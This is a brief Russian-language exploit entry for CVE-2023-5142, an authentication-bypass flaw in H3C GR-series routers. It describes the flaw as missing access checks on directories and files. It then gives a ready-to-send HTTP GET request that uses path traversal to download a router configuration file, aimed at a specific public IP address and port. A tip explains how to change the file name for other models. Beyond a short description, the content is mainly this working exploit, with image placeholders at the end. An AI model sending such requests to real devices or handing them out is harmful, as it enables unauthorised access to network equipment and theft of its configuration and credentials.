
CVE-2023-5142
Продукт: Маршрутизатор серии GR
Версия: все
Оценка: высокий риск
Веб-сайт: http://www.h3c.com/
Опасности: Злоумышленники могут использовать эту уязвимость для получения конфиденциальной информации с маршрутизаторов, создавая специальные пакеты запросов для обхода проверки подлинности.
Принцип: Маршрутизатор не производил аутентификацию доступа к каталогам и связанным файлам
Эксплойт:
Примечание: необходимо изменить суффикс имени файла в POC, например, GR8300.cfg
GET /userLogin.asp/../actionpolicy_status/../GR1100-P.cfg HTTP/1.1
Host: 59.35.220.76:8989
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
изображение
изображение
изображение